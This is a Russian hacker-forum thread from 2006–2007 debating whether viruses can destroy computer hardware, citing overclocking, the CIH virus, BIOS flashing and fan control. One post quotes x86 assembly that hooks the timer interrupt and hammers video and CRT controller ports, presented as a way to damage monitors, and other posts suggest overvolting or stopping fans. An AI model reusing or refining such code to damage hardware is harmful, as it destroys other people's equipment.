Спор:"Есть ли вири которые убивают железо"

Discussion in 'Безопасность и Анонимность' started by Duke Nukem, 20 May 2006.

  1. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Теперь можно из под Винды замутить поднятие Fsb и если мать, не предназначена для оверклокинга то она тупо загнется. Знаю на личном опыте...
     
  2. Rabid Rabbit

    Rabid Rabbit Elder - Старейшина

    Joined:
    31 Aug 2003
    Messages:
    161
    Likes Received:
    15
    Reputations:
    -9
    DimaHbl4, это какаято уникальная материнка да=) А воще на ноуте моно и из под винды замутить - запустить напр игрульку и фс6 поднимется=)
    краем уха, слышал, прерывание 21 (это которое ДОС) чтоли ГГГГГГГГ жжош))))

    Ржунимагу

    в домашних условиях - низкоуровневым форматированием: сектора, дорожки, цилиндры, фактор чередования (или перекрытия) - это еще в те времена когда эти слова еще чтото означали реальное. Сейчас это просто виртуальные переменные, ничего общего с физическим положением считывающей головки на поверхности диска не имеющие. Ну а интерлив фактор остался только для дискет.

    Бугага))

    ЗЫ ЭЛТ-Мониторы действительно можно накрыть но не все.
    Code:
    Эта пpоцедypа висела на int 8 (реальный режим) - она пpосто тpясет экpан.....
            push dx
            mov al,2
            out 40h,al
            mov al,3
            out 40h,al
            mov dx,3dah
            in al,dx
            mov dl,0c0h
            mov al,33h
            out dx,al
            mov ax,word ptr cs:[offset _fd-100h]
            out dx,al
            add al,ah
            test al,8
            je _o08
            not ah
            add al,ah
    _o08:
            mov word ptr cs:[offset _fd-100h],ax
            pop dx
    _fd     dw 0ffh
    итд...
    А вот дpyгая пpоцедypа, котоpая выполняется паpаллельно:
    В общем MAIN procedure:
              mov ax,40h
              mov es,ax
    _video_gluk:
                 mov dx,es:[63h]
                 in al,40h
                 out dx,al
                 mov dl,0c0h
                 out dx,al
                 mov dx,3b4h
                 xor al,ah
                 sub ah,al
                 out dx,ax
               jmp _video_gluk
    Главная  сyть ясна, так что yлyчшайте, главное - не останавливаться на
    достигнyтом....  Вышепpиведеные пpоцедypы пpовеpены, но Я не могy на 100%
    yтвеpждать  что  y  вас  полyчится  -  на  ваших видеокаpте и монитоpе. Тyт
    зависит  от  пpоизводительности  тачки  (хотя  непонятно,  почемy, но - чем
    быстpее,  тем  кpyче)  и,  видимо,  от  монитоpа...  Кстати,  те починенные
    монитоpы  все  pавно  как-то тоpмозят... В частности тоpмозное пеpеpyбление
    pежимов и т.д. Видимо, хpеново чинят...;)
    (c) Black Angel
    
     
  3. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    Топик переполненный тупостью и бредом больше, чем любой другой на античате.... монитор сломать... мда...
     
  4. DisturbeR

    DisturbeR Elder - Старейшина

    Joined:
    11 Mar 2006
    Messages:
    95
    Likes Received:
    40
    Reputations:
    25
    Уникальности здесь никакой нет. Даже на моих старых материнках 3-4 летней давности можно было из под винды не только повышать fsb, но и напряжение на на проц, agp и др. Поднятием fsb по опыту знаю спалить чего-нибудь трудно. У меня месяцами работали системы на полном максимуме, без побочных эффектов.
    НО, на некоторых материнках существуют просто нереальные интервалы, в плане поднятия напряжения, завышенные многократно. Возможно, если выставить максимальные значения, чего нибудь и выйдет. Однако на себе не проверял, может система просто выпадет в даун… хз.
     
  5. Rabid Rabbit

    Rabid Rabbit Elder - Старейшина

    Joined:
    31 Aug 2003
    Messages:
    161
    Likes Received:
    15
    Reputations:
    -9
    DisturbeR, уникальная в том смысле что палится таким макаром. вобщем это спорный вопрос. дешевые материнки бывает и просто так летят, от скачков напряжения напр (если БП плохо фильтрует). а вообще я никогда не сталкивался с такими материнками где это можно мутить изпод винды. у меня асусы постоянно и один раз солтек была. утилиты для работы с видюхой пользовал но это не одно и тоже. мне думается тут 2 варианта: или выпадет в даун или будут сбои. один раз из-за перегрева проца был случай на старой тачке (амдэха 100 пр 133) улетел диск Цэ (практически пошли вразнос ФАТы и БутРекорд, попортилось файло)
    . Нашкодило здорово так.
     
    #25 Rabid Rabbit, 7 Jul 2006
    Last edited: 7 Jul 2006
  6. DisturbeR

    DisturbeR Elder - Старейшина

    Joined:
    11 Mar 2006
    Messages:
    95
    Likes Received:
    40
    Reputations:
    25
    Из тех что помню - Soltek SL-FRN3, на nForce-2 Ultra (под сокет А) – с помощью nForce_sys_util и Giga-Byte GA-PE800, на Intel i845PE (под 478 сокет) – c помощью Gigabyte_EasyTune4.
    Перезагружаться не надо. Жмем кнопку, значения меняются на лету.
     
  7. Tikson

    Tikson Elder - Старейшина

    Joined:
    9 Oct 2005
    Messages:
    263
    Likes Received:
    42
    Reputations:
    14
    Кловер какой пароль на книгу Криса Касперски с nnm.ru ?
     
  8. kissa

    kissa Member

    Joined:
    7 Jul 2006
    Messages:
    8
    Likes Received:
    6
    Reputations:
    3
    Собственно говоря, вы зря смеетесь, так как действительно есть вири которые портят железо. Неверите могу поспорить на деньги.
     
  9. ArmageddonPro

    ArmageddonPro Elder - Старейшина

    Joined:
    11 May 2006
    Messages:
    272
    Likes Received:
    42
    Reputations:
    4
    Разработчики железа, наверное, тожа не дураки и уж постарались сделать всё возможное, чтобы железо нельзя было испортить.
    Теоретически можно предположить, что проц можно убить! Но как это сделать? Фактически нужно просто заставить его перегреться, но как? Выключить вентилятор на процессоре, но мать тогда просто вырубит питание и мы обломаемся. Тогда нужно обмануть мать(сказав, что вентилятор работает на полную), но как это сделать не представляю себе возможным поскольку излишнее питание нужно куда-то девать. - Здесь облом полный. Может кто и раскажет. что-то другое
    Хард: убить его не представляю себе возможным, но вот что-нить подпортить можно. Например, для чего проводиться дефрагментация все знают. А, что если мы поступим наоборот дефрагментации и будем дробить файлы, получая из них тысячи фрагментов на всём харде, - этим методом можно немного сократить жизнь харду поскольку считывающая головка будет усердно носиться по всей поверхности диска, причиняя себе физический износ, но долго ли? А нет, не долго, дело в том, что если мы так усердно начнём резать файлы в конечном итоге операционка начнёт грузиться очень и очень медленно и либо она сама произведёт дефрагментацию, либо её снесут и отформатируют жестак. - Вот и все старания и так же облом :p
    ОЗУ: вообще никак не испортить :p
    Видео, мать, сидюк: можно только подменить на официальном сайте прошивки к бивисам и тогда ликуй!!! Тоже можно восстановить! :rolleyes:
    У кого другие мнения? :confused:
     
    #29 ArmageddonPro, 7 Jul 2006
    Last edited: 7 Jul 2006
  10. ArmageddonPro

    ArmageddonPro Elder - Старейшина

    Joined:
    11 May 2006
    Messages:
    272
    Likes Received:
    42
    Reputations:
    4
    Всё же я склонен считать, что, если они и портят, то уж не железо , а прошивку, которую можно восстановить, но не всегда.
     
  11. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    На странице с которой ты скачивал книгу всё написано.
     
  12. r0

    r0 Elder - Старейшина

    Joined:
    17 Jul 2005
    Messages:
    450
    Likes Received:
    149
    Reputations:
    147
    Верно, всё зависит от кол-ва денег в твоем кошеле и/или безбашенности/озлобленности кодера :)
     
    1 person likes this.
  13. Rabid Rabbit

    Rabid Rabbit Elder - Старейшина

    Joined:
    31 Aug 2003
    Messages:
    161
    Likes Received:
    15
    Reputations:
    -9
    Есть еще датчик температуры внутри проца.
     
  14. CMD

    CMD New Member

    Joined:
    21 Jun 2006
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Спалить копм поднятием fsb нельзя я на своей A-939(nf4) Ставил придельный шаг фсб менял на максимум HT и ставил макс напряжение максимум че происходило был даун системы и жуткий писк.
    У меня еще можно из под виндуса уменьшать скорость вентиляторов вот это уже интересно я не разу с этим не баловался =) но фишка в том что скорость врашение можно поставить 0. Наводит на размышление =)
     
    1 person likes this.
  15. Shell

    Shell New Member

    Joined:
    13 Jan 2007
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Я лично проверил вредоносное действие Win9x.CIH на старом i486 DX/2. После запуска комп сразу завис, ничего не помогало, оставался только резет. Что я и сделал =) Потом комп перестал грузиться с любого носителя, хоть и в биос заходишь и настройки меняешь, обнуление Cmos ничего не дало. То пищит что-то (после появления таблицы), то ироглифы пишет.
    Вобщем хана матери, можно только программатором микросхему перепрошить в сервисе. =)
    Так что могу точно сказать, что "Есть ли вири которые убивают железо", хоть он и прошивает софтовую часть, но мать то не работает, и комп не работает. А когда он не работает какая разница от чего: от софта или железа - один фиг ты на нем ничего не сделаешь. Если конечно не починишь, но это уже другая история.
    Напряжение использумое ЭЛТ не регулируется напрямую софтом, так что эта идея неосуществима.
    Я думаю, что это предусмотрено разработчиками железа. Слышал фишку, что на Athlon'aх c сокетом А, при перегреве (достижении определенной критической температуры) проца, комп автоматом вырубается, так что если это так то спалить проц нереально
     
  16. S|\/|eliyK()T

    S|\/|eliyK()T Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    138
    Likes Received:
    58
    Reputations:
    11
    Интересная инфа..по поводу чернобыля.. тест всегда хорошо :)
    А вот на дату топика иногда поглядывать всё-же стоило.....
     
  17. x0x01

    x0x01 Elder - Старейшина

    Joined:
    19 Oct 2006
    Messages:
    32
    Likes Received:
    6
    Reputations:
    1
    Решил вставить свои 5 копеек :)
    - Моник убить нынче не реально, его напруга не контралится софтово, раньше можно было задать высокую частотку и "спалить" моник, причем последствия были самые разные от пробива высокочастотных катушек и заканчивая перегараниями нитей накала кинескопа, сейчас от этого стоит защита и максимум, чего можно добиться - черный экран с надписью о привышении допустимой частоты, да, можно его задрочить переключениями частотки, и вероятно, рано или поздно это даст какой-либо эффект.
    - BIOS. Безусловно и Gigabyte и Asus, да и пожалуй куча других производителей мамок пишут софт которым можно из вендов шить биос, менять на лету настройки железа и тд, но в современных мамках идет защита биоса от кривых рук, даже если ты туда прошьешь кусок mp3, комп все равно загрузится (увы, не всякий) и будет ждать либо флоп либо CD с корректной прошивкой, после чего содержимое BIOS с легкостью восстанавливается (проверено лично на Asus P4P800) А вот поднять питание процессора - можно. Неоднократно знакомые пытаясь разогнать что-то там, жгли проц.
    - Кулер: Видел "необычную" реализацию "управления кулером", до 0 его остановить видимо нельзя, а вот сказать что у него 999999 об/мин, оказываеся можно ;) немного подумав, кулер отключался, но защита от перегрева не даст пойти дальше.
    - Шина: Существуют разные мнения, но лично мне не разу не удавалось сжечь мамку поднятием частоты, теоретически - не отрицаю, знаю точно, что винты на некоторых мамках теряли инфу, были еденичные случаи когда затирась служебка, но это скорее исключение чем правило.
    - Видяха: гнал свою 9800pro, греется, охерено греется, от системника пышет жаром, поставил нормальную продувку - до сих пор разогнана по максимале, на чипе больше 100градусов когда нагрузку даешь, не горит 2й год, хочется спросить "что я делаю не так?" ;)
    - Флешка: угу, возможно и такое, флешка очень чувствительна к перезаписям, а если быть точным то к циклам записи, гипотетически ее можно "искуственно износить"
    Кажется все сказал, если еще чего вспомню - допишу
    UP:
    Как доносят спутники - шпионы тут описана проблема износа жесткого диска переходами в спящий режим и обратно
     
    #37 x0x01, 1 Feb 2007
    Last edited: 27 Nov 2007
    2 people like this.
  18. НоЧнОй МрАк

    Joined:
    5 Nov 2006
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Вирусы портящие железо!

    Итак дамы и господа прошу подсказать какие на данный момент есть вирусы реально портяшие тобиш выводящие из строя " железо " компьютера. Неважно что это будет- сам просессор, жосткий,монитор или видеокарта ) пишите про все вирусы такого рода))) очень надо...Лично я знаю из вирусов такого плана только 1 -Чернобыль но он некатит ибо оч стар и на 98 винду ток идет.. а ЩАС как вы знаете 98 в деревнях токо юзают :d
     
  19. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    Винда тебе не даст запороть железо
     
  20. Francuz

    Francuz Elder - Старейшина

    Joined:
    2 Nov 2007
    Messages:
    94
    Likes Received:
    21
    Reputations:
    -5
    to НоЧнОй МрАк:
    ///Прикольно было бы тебе , если б вирус в BIOS повысил cpu clock до максимума....
    а лучше напряжение на всех частях компа....
    потом загорается комп, далее по схеме, > занавеска> потолок> другая занавеска> стены>стол >другие стены>вся комната> ффся другая комната> фсе остальные комныты> все остальные квартиры.....///

    неправда-ли МоЩнАаа!?!?!?!

    Я понимаю маздай убить, но железо.... это же совсем другое дело!!!! Оно же денег стоит.....
    Зачем такое???

    Я бы не зделал такое даже моему самому ЁбНуТоМУУ врагу....!

    А представь, что с тобой зделают, если узнают....твоё лечение(или похороны) будут стоить дороже даже, чем тот комп который ты убил....

    ЗАБЕЙ НА ЭТО!
    Из-За ТаКих КаК тЫЫ,,, МоЙйИИ ПреДкИИ сЧитАюТ, что ХаКеРаМ мМесТо В ТюрЬЬмЕ....!!!!
     
    1 person likes this.